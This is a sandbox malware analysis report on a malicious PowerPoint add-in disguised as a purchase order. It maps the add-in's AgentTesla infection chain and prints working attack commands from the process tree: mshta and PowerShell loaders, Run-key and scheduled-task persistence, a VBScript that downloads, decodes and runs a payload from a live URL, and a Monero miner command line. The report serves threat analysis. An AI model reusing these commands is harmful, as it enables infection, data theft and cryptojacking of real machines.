Resubmissions
25-08-2021 09:54
210825-79rzfjvlw2 1025-08-2021 09:51
210825-tbz8595366 1028-04-2021 22:50
210428-csmgr8bxe2 10Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
28-04-2021 22:50
Static task
static1
Behavioral task
behavioral1
Sample
PO - CE AUSTRALIA PTY LTD.ppam
Resource
win7v20210410
Behavioral task
behavioral2
Sample
PO - CE AUSTRALIA PTY LTD.ppam
Resource
win10v20210408
General
-
Target
PO - CE AUSTRALIA PTY LTD.ppam
-
Size
10KB
-
MD5
7c629522213c57c3b3d66ee8e6c13fed
-
SHA1
352b55636c67a5cd27a998888df0a137ef5433d8
-
SHA256
a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
-
SHA512
385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\74AX7LAV\5940e4_39e7aca5ca73408f9ea38510ed3aa48e[1].txt
ryuk
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4372 4656 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3928 804 powershell.exe -
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
AgentTesla Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4000-186-0x0000000000437DCE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 27 IoCs
Processes:
mshta.exepowershell.exemshta.exeWScript.exeflow pid process 31 4372 mshta.exe 33 4372 mshta.exe 35 4372 mshta.exe 37 4372 mshta.exe 39 4372 mshta.exe 41 4372 mshta.exe 43 4372 mshta.exe 45 4372 mshta.exe 47 4372 mshta.exe 49 4372 mshta.exe 51 4372 mshta.exe 52 4372 mshta.exe 53 4372 mshta.exe 54 4372 mshta.exe 56 4372 mshta.exe 59 3928 powershell.exe 61 3928 powershell.exe 65 3928 powershell.exe 68 1776 mshta.exe 69 1776 mshta.exe 70 1776 mshta.exe 71 1776 mshta.exe 72 1776 mshta.exe 74 4300 WScript.exe 76 4300 WScript.exe 78 4300 WScript.exe 80 4300 WScript.exe -
Drops file in Drivers directory 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe -
Executes dropped EXE 1 IoCs
Processes:
bin.txtpid process 576 bin.txt -
Processes:
resource yara_rule behavioral2/memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp upx -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe -
Drops file in System32 directory 1 IoCs
Processes:
mmc.exedescription ioc process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exebin.txtdescription pid process target process PID 3928 set thread context of 4000 3928 powershell.exe aspnet_compiler.exe PID 576 set thread context of 4600 576 bin.txt explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2148 4372 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4568 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings cmd.exe -
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WScript.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 4656 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exeWerFault.exeaspnet_compiler.exepid process 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 3928 powershell.exe 3928 powershell.exe 4000 aspnet_compiler.exe 4000 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
mmc.exepid process 4152 mmc.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
aspnet_compiler.exepid process 4000 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetaskkill.exeWerFault.exeaspnet_compiler.exemmc.exedescription pid process Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeIncreaseQuotaPrivilege 3928 powershell.exe Token: SeSecurityPrivilege 3928 powershell.exe Token: SeTakeOwnershipPrivilege 3928 powershell.exe Token: SeLoadDriverPrivilege 3928 powershell.exe Token: SeSystemProfilePrivilege 3928 powershell.exe Token: SeSystemtimePrivilege 3928 powershell.exe Token: SeProfSingleProcessPrivilege 3928 powershell.exe Token: SeIncBasePriorityPrivilege 3928 powershell.exe Token: SeCreatePagefilePrivilege 3928 powershell.exe Token: SeBackupPrivilege 3928 powershell.exe Token: SeRestorePrivilege 3928 powershell.exe Token: SeShutdownPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeSystemEnvironmentPrivilege 3928 powershell.exe Token: SeRemoteShutdownPrivilege 3928 powershell.exe Token: SeUndockPrivilege 3928 powershell.exe Token: SeManageVolumePrivilege 3928 powershell.exe Token: 33 3928 powershell.exe Token: 34 3928 powershell.exe Token: 35 3928 powershell.exe Token: 36 3928 powershell.exe Token: SeIncreaseQuotaPrivilege 3928 powershell.exe Token: SeSecurityPrivilege 3928 powershell.exe Token: SeTakeOwnershipPrivilege 3928 powershell.exe Token: SeLoadDriverPrivilege 3928 powershell.exe Token: SeSystemProfilePrivilege 3928 powershell.exe Token: SeSystemtimePrivilege 3928 powershell.exe Token: SeProfSingleProcessPrivilege 3928 powershell.exe Token: SeIncBasePriorityPrivilege 3928 powershell.exe Token: SeCreatePagefilePrivilege 3928 powershell.exe Token: SeBackupPrivilege 3928 powershell.exe Token: SeRestorePrivilege 3928 powershell.exe Token: SeShutdownPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeSystemEnvironmentPrivilege 3928 powershell.exe Token: SeRemoteShutdownPrivilege 3928 powershell.exe Token: SeUndockPrivilege 3928 powershell.exe Token: SeManageVolumePrivilege 3928 powershell.exe Token: 33 3928 powershell.exe Token: 34 3928 powershell.exe Token: 35 3928 powershell.exe Token: 36 3928 powershell.exe Token: SeDebugPrivilege 2148 WerFault.exe Token: SeDebugPrivilege 4000 aspnet_compiler.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
POWERPNT.EXEmshta.exemmc.exeaspnet_compiler.exepid process 4656 POWERPNT.EXE 4656 POWERPNT.EXE 4656 POWERPNT.EXE 4372 mshta.exe 4152 mmc.exe 4152 mmc.exe 4000 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exemshta.exemshta.execmd.exeWScript.exebin.txtdescription pid process target process PID 4656 wrote to memory of 4372 4656 POWERPNT.EXE mshta.exe PID 4656 wrote to memory of 4372 4656 POWERPNT.EXE mshta.exe PID 4372 wrote to memory of 2648 4372 mshta.exe schtasks.exe PID 4372 wrote to memory of 2648 4372 mshta.exe schtasks.exe PID 4372 wrote to memory of 4568 4372 mshta.exe taskkill.exe PID 4372 wrote to memory of 4568 4372 mshta.exe taskkill.exe PID 3928 wrote to memory of 3948 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3948 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 3948 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 3928 wrote to memory of 4000 3928 powershell.exe aspnet_compiler.exe PID 1496 wrote to memory of 1776 1496 mshta.exe mshta.exe PID 1496 wrote to memory of 1776 1496 mshta.exe mshta.exe PID 1776 wrote to memory of 3120 1776 mshta.exe cmd.exe PID 1776 wrote to memory of 3120 1776 mshta.exe cmd.exe PID 3120 wrote to memory of 4300 3120 cmd.exe WScript.exe PID 3120 wrote to memory of 4300 3120 cmd.exe WScript.exe PID 4300 wrote to memory of 576 4300 WScript.exe bin.txt PID 4300 wrote to memory of 576 4300 WScript.exe bin.txt PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe PID 576 wrote to memory of 4600 576 bin.txt explorer.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SYSTEM32\mshta.exemshta http://www.j.mp/llsoaskokcdokoktewelvw2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/19.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
PID:2648 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4568 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4372 -s 30483⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵PID:3948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4000
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4152
-
\??\c:\windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%[email protected]/p/19.html"", 0 : window.close")1⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://1230948[email protected]/p/19.html2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>lulupupugugugagamotherfucker.vbs &@echo dim stream_obj >>lulupupugugugagamotherfucker.vbs &@echo dim shell_obj >>lulupupugugugagamotherfucker.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>lulupupugugugagamotherfucker.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo URL = "https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_39e7aca5ca73408f9ea38510ed3aa48e.txt">>lulupupugugugagamotherfucker.vbs &@echo http_obj.open "GET", URL, False >>lulupupugugugagamotherfucker.vbs &@echo http_obj.send >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.type = 1 >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.open >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.write http_obj.responseBody >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.savetofile "C:\Users\Public\scan.txt", 2 >>lulupupugugugagamotherfucker.vbs &@echo Dim xxx >>lulupupugugugagamotherfucker.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\scan.txt", 1) >>lulupupugugugagamotherfucker.vbs &@echo content = file.ReadAll >>lulupupugugugagamotherfucker.vbs &@echo content = StrReverse(content) >>lulupupugugugagamotherfucker.vbs &@echo Dim fso >>lulupupugugugagamotherfucker.vbs &@echo Dim fdsafdsa >>lulupupugugugagamotherfucker.vbs &@echo Dim oNode, fdsaa >>lulupupugugugagamotherfucker.vbs &@echo Const adTypeBinary = 1 >>lulupupugugugagamotherfucker.vbs &@echo Const adSaveCreateOverWrite = 2 >>lulupupugugugagamotherfucker.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>lulupupugugugagamotherfucker.vbs &@echo oNode.dataType = "bin.base64">>lulupupugugugagamotherfucker.vbs &@echo oNode.Text = content >>lulupupugugugagamotherfucker.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Type = adTypeBinary >>lulupupugugugagamotherfucker.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.txt") >>lulupupugugugagamotherfucker.vbs &@echo LocalFile = tempdir >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Open >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>lulupupugugugagamotherfucker.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo If (fso.FileExists(LocalFile)) Then >>lulupupugugugagamotherfucker.vbs &@echo fdsafdsa.Exec (LocalFile) >>lulupupugugugagamotherfucker.vbs &@echo End If >>lulupupugugugagamotherfucker.vbs& lulupupugugugagamotherfucker.vbs &dEl lulupupugugugagamotherfucker.vbs3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\lulupupugugugagamotherfucker.vbs"4⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Public\bin.txtC:\Users\Public\bin.txt5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=506⤵PID:4600
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_5CCE0F5A48D99B9446BB2EDF09EF208A
MD52f8c9e1fff0efd6c541b11dbddd18ec8
SHA1720de8d5681917f103d77c760dc95a624c81b4d8
SHA256d2d81953f6f7be7dc040ca8e897994f40a13d54f562c2a3a23654181f57baaa9
SHA512616dc5ad46163055e0bc6e26908355782a854af3aa53b43a7c35ea1bfdbe014414ee1f68c0f3a4e8c73f93145e7d0ca3b92289c7e1e86b7a8757be18ae50194c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_9E586C9C4EFA6BF55193BA5712A132CE
MD55469e80fdc936793fa376002348151a8
SHA1ad89edeb3e2851e7099e4a2b64b9809ae8d54df2
SHA2568e74acc5da52c171ad3a5d768c86c49a67fedddbbfcaba0372472256915ddf79
SHA5123e2c3cc36062d12e3253ed21652210fa4a4a78a4f099499662f258c718cb55b50fef8a98f097cad7c01198c823113c0d798cdb8808743813fa96abc0431ace4c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_DF018E1926302C6B4981E6FB53557FDA
MD53d7683aef89fb9cac9eefde8ed002c68
SHA12cd7fd52f9878914df215d3a31f7a62c27495c33
SHA2562c8ff5c9f5342d8194721f2b2a5a489ab644162a450bd2eba0fe7242a1bff37e
SHA51236ef3c6c580f2b3fbdd11f36a72696e1cfbcb49c22e50887be0ccbdbc60142c7cc89ae526ef841dd0b45f5382941e11840105ea7a7377ab79019f2fe563e2ca2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
MD54f914d6a12b48374677859978d3def97
SHA1d29a1ff9bc1fbf5c4c0cf3210c9aefe33fc8e5a5
SHA256eb9ac8c88c0857b9588076073491eec79f4725aa32bc7af00c20ef31095d1d68
SHA512ab9cc44820d05b5207d1210e189041f3df258346619f05ae1b058de8b358438095a09b0fed26fcf09d7d08caae353f680936ebe24fdc94c18411463d5ecfbe61
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_5CCE0F5A48D99B9446BB2EDF09EF208A
MD5d3ad9e312b41af366df0c4d665bf6d7b
SHA1c1cf397dcd63e1453e8073b8cf988f661c7cabed
SHA256e5a86df7a101749d8e95047377b7e01e69694bedc258e40da5e2f46cc9272754
SHA5124800b1f796b94fdd20d5f5d464d40a5229610443256488f1f82ddbaf7e43706e4fb5a2f220a034ce1e8767cc57600d2b455210d286cfd6865f6a9f7a6e3adc3c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_9E586C9C4EFA6BF55193BA5712A132CE
MD52c9701f8fc6281ed1a13c8e8d9463d69
SHA1ae36a69c1b8554f7e89a0ab74753925cf6d0f549
SHA256c9873fcd93220d6f7cf0bda20b4fbbf24c29b7915638af06b0d69ca84828d9ea
SHA512e1f42ceda33d6e7fd5cbb3d78060ed23a23a030684df198fabab5069c494baa87972a9b4d4552b4e05369b98b84de3409a980ec8a75eb3d1889e3635a000b2ba
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_DF018E1926302C6B4981E6FB53557FDA
MD55fe98101913f5fe3d33eb09861f711dc
SHA1dea0192f13119692fbbe2f3a7a94dba9a6ff9bae
SHA256f04f764f20f6177b162153d75506a143e3956f3a510471656eb71a78d0c45640
SHA512194ab9bd114cd2a9b8ef28bb4ac129164a9be66a15a674280570c020a494b944e831b43627dfbd1bd6614cd2fb268f38b57866a88eb0e296f6e62cc7249c79f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B
MD5df3ed85a573408f0a18ba1fe6b9d5d0d
SHA1998a77edc61757d552ac5a8852c2e050cc3a133f
SHA25620857608991980c77183f0a92ef93cd85d8d0f50b1bd4c1595ee98ef170ab24c
SHA512626ecd1e1eb594be648b10036c837f2ec29c03f72021b2a5901b279479e474276b4670ae360b63a6745e18401da463e8e4bebdb629fedb7b4c71110588a3da5d
-
MD5
cb9af0197f496f52b471a76cfd8d601a
SHA1067b3ee27f6b49431b5c72791d52f353c577853b
SHA256da3eb4ab25e02a8dc118febc626df495acd468e84bc0b9767b56e8959b150f99
SHA512504e25f2e2204d2015236792eadd3c5cf353734e7ea16f500a272b9f915bf1321a10e908cf63873a29b89be5fb28c6aa34cab60f2b977378eb0b91c910dbc783
-
MD5
4f7de2e6afefb125b1f14fa5cda610ee
SHA157a145f234b504a73f9d55cf39f2231a04719456
SHA256ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044
SHA5129e3c207f0931ee4c5f48e62670f33d33815cf0779ac5f719017401c20273b4e0403ce03c08643a58ba4c3b023f9c691c34e8fda776b710dfe8ee3dbfee7d887b
-
MD5
c29aa18d795af74929173ceb3122e759
SHA15b39dbf5bbecfc61d844242c136d3f1ceea88d7f
SHA25622ca5e3dcd26fa66a4af4b4a5d47a6a3a17f4cb9abdd03707901758b28f5c1d6
SHA5125b83a0f0f0c9977185ff5990033df9c75b348d09e4814c64abf58a9a8c4f41f8e3d636f0119ccb576cc2484f4e133245672596a87a7a8b2fcd56cde08c696c61
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NPXJ0CH4\body_gradient_tile_light[1].png
MD53b2a20d5b0ba4ca0c5dd90865ad6b9c4
SHA1a90928a16d11d21e112b45b60990a9d7d19cc1d5
SHA2560fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
